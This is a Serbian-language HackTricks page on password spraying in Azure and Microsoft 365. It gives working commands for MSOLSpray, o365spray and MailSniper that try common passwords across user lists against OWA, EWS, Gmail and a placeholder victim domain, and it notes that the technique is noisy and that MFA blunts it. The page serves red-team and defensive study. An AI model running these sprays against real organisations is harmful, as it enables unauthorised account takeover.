Serbian - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Password Spraying

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Prskanje lozinki

U Azure-u ovo se može uraditi protiv različitih API endpointa kao što su Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, itd.

Međutim, treba napomenuti da je ova tehnika veoma bučna i Plavi Tim je lako može primetiti. Osim toga, obavezna kompleksnost lozinke i korišćenje MFA mogu učiniti ovu tehniku beskorisnom.

Možete izvesti napad prskanja lozinki pomoću MSOLSpray alata.

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Ili sa o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Ili sa MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

PreviousAz - Device Code Authentication PhishingNextAz - Services

Last updated